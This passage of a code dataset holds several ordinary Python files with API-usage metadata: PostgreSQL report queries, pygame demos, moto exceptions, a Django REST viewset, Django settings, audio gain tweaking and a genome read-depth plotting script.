"attribute"}, {"api_name": "numpy.all", "line_number": 
160, "usage_type": "call"}, {"api_name": "numpy.isclose", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 160, "usage_type": "call"}, {"api_name": "igorwriter.IgorWave", "line_number": 162, "usage_type": "call"}, {"api_name": "igorwriter.IgorWave", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 184, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 194, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 194, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 194, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 216, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 211, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 211, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 223, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 223, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 223, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 220, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 220, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 227, "usage_type": "attribute"}, {"api_name": "plotly.graph_objs", "line_number": 227, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 237, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 241, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 241, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 259, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 259, "usage_type": "name"}, {"api_name": "numpy.int32", "line_number": 267, "usage_type": "attribute"}, {"api_name": "dat_object.make_dat.get_dat", "line_number": 270, "usage_type": "call"}, {"api_name": "deprecation.deprecated", "line_number": 258, "usage_type": "call"}]} +{"seq_id": "414673238", "text": "#!/usr/bin/env python3\n\nimport psycopg2\n\nDBNAME = \"news\"\n\ndef connect(database_name=DBNAME):\n try:\n db = psycopg2.connect(\"dbname={}\".format(database_name))\n cursor = db.cursor()\n return db, cursor\n except:\n print(\"\")\n\ndef questionOne():\n '''Question 1.'''\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n c.execute(\"SELECT title, views FROM articles \\\n LEFT JOIN (SELECT path, count(*) AS views \\\n FROM log GROUP BY path) AS v \\\n ON path LIKE '%' || slug \\\n order by views desc limit 3;\")\n aList = c.fetchall()\n print(\"\\n\")\n print(\"The most popular three articles of all time\")\n for (x,y) in aList:\n print(\"%s - %d views\" % (x, y))\n db.close()\n\ndef questionTwo():\n '''Question 2.'''\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n c.execute(\"SELECT name, sum(views) AS sumOfViews FROM authors \\\n LEFT JOIN (SELECT title, author, 
views FROM articles \\\n LEFT JOIN (SELECT path, count(*) AS views FROM log GROUP BY path) AS v \\\n ON path LIKE '%' || slug) AS a \\\n ON authors.id = a.author GROUP BY authors.id;\")\n aList = c.fetchall()\n print(\"\\n\")\n print(\"The most popular article authors of all time\")\n for (x,y) in aList:\n print(\"%s - %d views\" % (x, y))\n db.close()\n\ndef questionThree():\n '''Question 3.'''\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query = \"SELECT fail.d, (fail.num*100.0/total.num) AS percentage \\\n FROM (SELECT cast(time AS date) AS d, count(status) AS num FROM log \\\n where status not LIKE 200 || '%' GROUP BY d) AS fail \\\n JOIN (SELECT cast(time AS date) AS d, count(status) AS num FROM log \\\n GROUP BY d) AS total \\\n ON fail.d = total.d where (fail.num*100.0/total.num) > 1;\"\n c.execute(query)\n aList = c.fetchall()\n print(\"\\n\")\n print(\"Days did more than 1% of requests lead to errors\")\n for (x,y) in aList:\n print(\"%s - %.2f%% errors\" % (x, y))\n db.close()\n\ndef main():\n questionOne()\n questionTwo()\n questionThree()\n\nif __name__ == '__main__':\n main()\n", "sub_path": "news.py", "file_name": "news.py", "file_ext": "py", "file_size_in_byte": 2294, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "psycopg2.connect", "line_number": 9, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 17, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 33, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "649244621", "text": "import os\r\nimport pygame\r\nfrom PIL import Image\r\nimport time\r\nimport animations\r\nimport game_var\r\n\r\n# Variables\r\n\r\n\r\n\r\npygame.display.set_caption('Turtle Simulator')\r\npygame.display.set_icon(game_var.logo64x)\r\n\r\n################################################################\r\n# #\r\n# Animations and Cutscenes #\r\n# #\r\n################################################################\r\n\r\n# Startup Screen\r\n\r\n\r\n\r\ntime.sleep(1)\r\n\r\nskip_startup = False\r\nfor event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_LSHIFT:\r\n print('Startup sequence skipped!')\r\n skip_startup = True\r\n\r\npygame.init() \r\n\r\nanimations.startup_sequence(skip_startup)\r\n\r\n# Game Loop\r\n\r\nwhile game_var.running:\r\n \r\n # Check Game State\r\n\r\n GAME_STATE = game_var.game_state.split('.')\r\n\r\n if GAME_STATE[0] == 'homescreen':\r\n pygame.time.delay(20)\r\n animations.home_screen()\r\n pygame.display.update()\r\n if GAME_STATE[0] == 'play':\r\n None", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1155, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.display.set_caption", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 13, "usage_type": "attribute"}, {"api_name": "game_var.logo64x", "line_number": 13, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 28, "usage_type": "attribute"}, {"api_name": 
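In `questionThree` above, the failure filter `where status not LIKE 200 || '%'` concatenates the integer 200 with the string '%' and leans on an implicit cast; since `status` in the news database is text such as '200 OK', the same intent is clearer as a plain string pattern. A hedged rewrite of just the failure subquery:

```python
import psycopg2

db = psycopg2.connect(database='news')
c = db.cursor()
# '200%' as an explicit string literal avoids the implicit int-to-text cast
c.execute("""
    SELECT cast(time AS date) AS day, count(*) AS num
    FROM log
    WHERE status NOT LIKE '200%'
    GROUP BY day;
""")
failures_per_day = c.fetchall()
db.close()
```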
"pygame.KEYDOWN", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 33, "usage_type": "call"}, {"api_name": "animations.startup_sequence", "line_number": 35, "usage_type": "call"}, {"api_name": "game_var.running", "line_number": 39, "usage_type": "attribute"}, {"api_name": "game_var.game_state.split", "line_number": 43, "usage_type": "call"}, {"api_name": "game_var.game_state", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 46, "usage_type": "attribute"}, {"api_name": "animations.home_screen", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 48, "usage_type": "attribute"}]} +{"seq_id": "18487481", "text": "from __future__ import unicode_literals\nfrom moto.core.exceptions import JsonRESTError\n\n\nclass InvalidInputException(JsonRESTError):\n code = 400\n\n def __init__(self):\n super(InvalidInputException, self).__init__(\n \"InvalidInputException\",\n \"You provided a value that does not match the required pattern.\",\n )\n\n\nclass DuplicateOrganizationalUnitException(JsonRESTError):\n code = 400\n\n def __init__(self):\n super(DuplicateOrganizationalUnitException, self).__init__(\n \"DuplicateOrganizationalUnitException\",\n \"An OU with the same name already exists.\",\n )\n", "sub_path": "moto/organizations/exceptions.py", "file_name": "exceptions.py", "file_ext": "py", "file_size_in_byte": 638, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "moto.core.exceptions.JsonRESTError", "line_number": 5, "usage_type": "name"}, {"api_name": "moto.core.exceptions.JsonRESTError", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "2262271", "text": "from rest_framework.mixins import CreateModelMixin, ListModelMixin\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_201_CREATED\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom v1.decorators.nodes import is_signed_message\nfrom ..models.invalid_block import InvalidBlock\nfrom ..serializers.invalid_block import InvalidBlockSerializer, InvalidBlockSerializerCreate\n\n\nclass InvalidBlockViewSet(\n CreateModelMixin,\n ListModelMixin,\n GenericViewSet,\n):\n \"\"\"\n Invalid blocks\n\n ---\n list:\n description: List invalid blocks\n create:\n description: Create invalid block\n \"\"\"\n\n ordering_fields = '__all__'\n queryset = InvalidBlock.objects.all()\n serializer_class = InvalidBlockSerializer\n serializer_create_class = InvalidBlockSerializerCreate\n\n @is_signed_message\n def create(self, request, *args, **kwargs):\n serializer = self.serializer_create_class(\n data=request.data,\n context={'request': request}\n )\n serializer.is_valid(raise_exception=True)\n invalid_block = serializer.save()\n\n return Response(\n self.get_serializer(invalid_block).data,\n status=HTTP_201_CREATED\n )\n", "sub_path": "v1/invalid_blocks/views/invalid_block.py", "file_name": "invalid_block.py", "file_ext": "py", "file_size_in_byte": 1247, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 12, "usage_type": "name"}, {"api_name": 
"rest_framework.mixins.ListModelMixin", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 14, "usage_type": "name"}, {"api_name": "models.invalid_block.InvalidBlock.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.invalid_block.InvalidBlock.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.invalid_block.InvalidBlock", "line_number": 27, "usage_type": "name"}, {"api_name": "serializers.invalid_block.InvalidBlockSerializer", "line_number": 28, "usage_type": "name"}, {"api_name": "serializers.invalid_block.InvalidBlockSerializerCreate", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 40, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 42, "usage_type": "name"}, {"api_name": "v1.decorators.nodes.is_signed_message", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "198265102", "text": "import pygame\nimport math\n\nWINDOW_SIZE = WINDOW_WIDTH, WINDOW_HEIGHT = 800, 600\nFPS = 30\n\nr1 = [(-20, 10), 150]\nr2 = [((WINDOW_WIDTH - 200) // 2, (WINDOW_HEIGHT - 150) // 2), 80]\n\n\ndef intercect(c1, c2):\n l = math.hypot(c1[0][0]-c2[0][0], c1[0][1]-c2[0][1])\n if l > c1[1] + c2[1]:\n return False\n return True\n\n\ndef main():\n pygame.init()\n clock = pygame.time.Clock()\n screen = pygame.display.set_mode(WINDOW_SIZE)\n bg = pygame.Color('black')\n c1 = pygame.Color('red')\n c2 = pygame.Color('blue')\n c3 = pygame.Color('green')\n\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n break\n if event.type == pygame.MOUSEMOTION:\n r1[0] = event.pos\n if not running:\n break\n\n # проверка пересечения\n pygame.display.set_caption(f'{intercect(r1, r2)}')\n\n screen.fill(bg)\n\n pygame.draw.circle(screen, c1, r1[0], r1[1], 2)\n pygame.draw.circle(screen, c2, r2[0], r2[1], 2)\n pygame.draw.line(screen, c3, r1[0], r2[0], 2)\n\n clock.tick(FPS)\n pygame.display.flip()\n pygame.display.quit()\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "Pygame/PyGame06-01.py", "file_name": "PyGame06-01.py", "file_ext": "py", "file_size_in_byte": 1283, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "math.hypot", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEMOTION", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 39, 
"usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.display.quit", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 49, "usage_type": "attribute"}]} +{"seq_id": "212242801", "text": "import os\nimport random\nfrom pydub import AudioSegment\n\nsample = AudioSegment.from_file('20hzSinLoud.wav')\nnewSample = sample[:1]\n\nfor target in range(len(sample) // 20):\n gain = random.randint(-100, 100)\n adjustedTarget = sample[(target * 20):(target * 20 + 20)] + gain\n newSample = newSample + adjustedTarget\nsavedFile = 'randomlyAdjusted20hz.wav'\nnewSample.export(savedFile, format=\"wav\")\n", "sub_path": "fulltest/listeningExp2.py", "file_name": "listeningExp2.py", "file_ext": "py", "file_size_in_byte": 401, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pydub.AudioSegment.from_file", "line_number": 5, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 5, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "452048752", "text": "import os\nimport dj_database_url\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nPROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', 'devkey')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = os.environ.get('DEBUG', False) == 'true'\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n # Disable Django's own staticfiles handling in favour of WhiteNoise, for\n # greater consistency between gunicorn and `./manage.py runserver`. 
See:\n # http://whitenoise.evans.io/en/stable/django.html#using-whitenoise-in-development\n 'whitenoise.runserver_nostatic',\n 'django.contrib.staticfiles',\n\n 'django_twilio',\n 'raven.contrib.django.raven_compat',\n\n 'ingress',\n 'egress',\n 'periods',\n]\n\nMIDDLEWARE = [\n 'raven.contrib.django.raven_compat.middleware.Sentry404CatchMiddleware',\n 'raven.contrib.django.raven_compat.middleware.SentryResponseErrorIdMiddleware', # noqa: E501\n 'django.middleware.security.SecurityMiddleware',\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'ymrj.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(PROJECT_ROOT, 'templates'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n 'debug': DEBUG,\n },\n },\n]\n\nWSGI_APPLICATION = 'ymrj.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.10/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', # noqa: E501\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', # noqa: E501\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', # noqa: E501\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', # noqa: E501\n },\n]\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.10/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Update database configuration with $DATABASE_URL.\ndb_from_env = dj_database_url.config(conn_max_age=500)\nDATABASES['default'].update(db_from_env)\n\n# Honor the 'X-Forwarded-Proto' header for request.is_secure()\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\n# Allow all host headers\nALLOWED_HOSTS = os.environ.get('ALLOWED_HOSTS', '*').split(',')\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.10/howto/static-files/\n\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')\nSTATIC_URL = '/static/'\n\n# Extra places for collectstatic to find static files.\nSTATICFILES_DIRS = [\n os.path.join(PROJECT_ROOT, 'static'),\n]\n\n# Simplified static file serving.\n# https://warehouse.python.org/project/whitenoise/\nSTATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'\n\n# Celery\nCELERY_BROKER_URL = os.environ.get('CLOUDAMQP_URL', None)\n\n# Twilio\nTWILIO_MESSAGING_SERVICE_ID = os.environ.get('TWILIO_MESSAGING_SERVICE_ID')\nTWILIO_FROM_NUMBER = os.environ.get('TWILIO_FROM_NUMBER')\n\nTWILIO_ENABLED = bool(TWILIO_MESSAGING_SERVICE_ID or TWILIO_FROM_NUMBER)\nif not TWILIO_ENABLED:\n print('Twilio is disabled because there was no configuration for it')\n\n# 
Sentry\nRAVEN_CONFIG = {\n 'dsn': os.environ.get('SENTRY_DSN'),\n}\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'root': {\n 'level': 'WARNING',\n 'handlers': ['sentry'],\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s '\n '%(process)d %(thread)d %(message)s'\n },\n },\n 'handlers': {\n 'sentry': {\n 'level': 'ERROR',\n 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler', # noqa: E501\n 'tags': {'custom-tag': 'x'},\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose'\n }\n },\n 'loggers': {\n 'django.db.backends': {\n 'level': 'ERROR',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n },\n}\n", "sub_path": "ymrj/settings.py", "file_name": "settings.py", "file_ext": "py", "file_size_in_byte": 5869, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 16, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "dj_database_url.config", "line_number": 113, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 120, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 138, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 141, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 142, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 142, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 150, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 150, "usage_type": "attribute"}]} +{"seq_id": "408881983", "text": "#!/usr/bin/env python\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport argparse\n\n#parse arguments\nparser = argparse.ArgumentParser()\nparser.add_argument('--wt_file_name', type=str)\nparser.add_argument('--tu_file_name', 
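A small footgun in the settings module above: `DEBUG = os.environ.get('DEBUG', False) == 'true'` is case-sensitive, so `DEBUG=True` or `DEBUG=1` in the environment silently leaves debug off. One tolerant alternative:

```python
import os

def env_bool(name, default=False):
    """Read a boolean-ish environment variable ('1', 'true', 'yes', 'on', any case)."""
    raw = os.environ.get(name)
    if raw is None:
        return default
    return raw.strip().lower() in ('1', 'true', 'yes', 'on')

DEBUG = env_bool('DEBUG')
```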
type=str)\nparser.add_argument('--window_size', default = 10000, type=int)\nargs = parser.parse_args()\n\n# function to read the depth file line by line\n# returns numpy arrays of chromosome types for each position, position index and the read-depth at the corresponding position\ndef read_depth_file(filename):\n f_depth = open(filename, \"r\")\n\n chromosomes, positions, reads = [], [], []\n while True: \n # Get next line from file\n line = f_depth.readline()\n # break the while cycle at the end of the file\n if not line:\n break\n \n # split the line and append values to the lists\n (chrom, pos, read) = line.split(\"\\t\")\n chromosomes.append(chrom), positions.append(int(pos)), reads.append(int(read))\n\n f_depth.close()\n return chromosomes, np.array(positions), np.array(reads)\n\n# function to plot the read depth averaged over a windows defined by window_size\n# save the plot in PNG file with name defined in im_name\ndef plot_read_depth(x, y, chrom, type_genome, window_size, color, im_name, ratio=False):\n # plot settings - size of figure, labels, title\n plt.figure(figsize=(15, 10))\n plt.plot(x/1000000, y, 'o', markersize=5, markeredgewidth=0.7, markeredgecolor=\"w\", color=color)\n\n plt.xlabel(f'Chromosome {chrom[0]} positions [Mb]')\n if not ratio:\n plt.ylabel('Read-depth') \n else:\n plt.ylabel('Log2 ratio') \n plt.title(f'Read depth {type_genome} (averaged every {window_size} bases)')\n plt.savefig(im_name)\n\n# function to take average of the reads (and positions) over the window - shoul be rigid against window size, which does not divide the length of the data\ndef average_over_window(x, y, window_size):\n # take modulo to deal with window size, which do not divide the length of the data\n mod = len(x) % window_size\n \n # take the reads without the values in the last window (if neccesary), get means of the windows\n # concatenate with mean of the last window\n if mod == 0:\n x_mean = np.mean(x.reshape(-1, window_size), axis=1) \n else:\n x_mean = np.mean(x[:-mod].reshape(-1, window_size), axis=1)\n x_mean_rest = np.array(np.mean(x[-mod:]))[np.newaxis] \n x_mean = np.concatenate((x_mean, x_mean_rest), axis=0)\n \n if mod == 0:\n y_mean = np.mean(y.reshape(-1, window_size), axis=1)\n else:\n y_mean = np.mean(y[:-mod].reshape(-1, window_size), axis=1)\n y_mean_rest = np.array(np.mean(y[-mod:]))[np.newaxis] \n y_mean = np.concatenate((y_mean, y_mean_rest), axis=0)\n return x_mean, y_mean\n\n# call all methods to produce the results\ndef main(args):\n # assign arguments\n wt_depth_filename = args.wt_file_name\n tu_depth_filename = args.tu_file_name\n window_size = args.window_size\n \n # read files into three numpy arrays\n wt_chromosomes, wt_positions, wt_reads = read_depth_file(wt_depth_filename)\n tu_chromosomes, tu_positions, tu_reads = read_depth_file(tu_depth_filename)\n \n # average the reads and positions over the windows \n wt_mean_positions, wt_mean_reads = average_over_window(wt_positions, wt_reads, window_size)\n tu_mean_positions, tu_mean_reads = average_over_window(tu_positions, tu_reads, window_size)\n \n # calculate log2 ratio, not dividing by zero\n log_ratio = np.log2(np.divide(tu_mean_reads, wt_mean_reads, where=wt_mean_reads!=0))\n \n # plot the data and save the final plots\n plot_read_depth(wt_mean_positions, wt_mean_reads, wt_chromosomes, \"of normal genome\", window_size, 'green', \"normal_depth.png\")\n plot_read_depth(tu_mean_positions, tu_mean_reads, tu_chromosomes, \"of tumor genome\", window_size, 'red', \"tumor_depth.png\")\n 
plot_read_depth(tu_mean_positions, log_ratio, tu_chromosomes, \"ratio\", window_size, 'blue', \"log2_ratio.png\", ratio=True)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args([] if \"__file__\" not in globals() else None)\n main(args)\n\n", "sub_path": "Assignment 1/depth_plot.py", "file_name": "depth_plot.py", "file_ext": "py", "file_size_in_byte": 4183, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "364094908", "text": "import numpy as 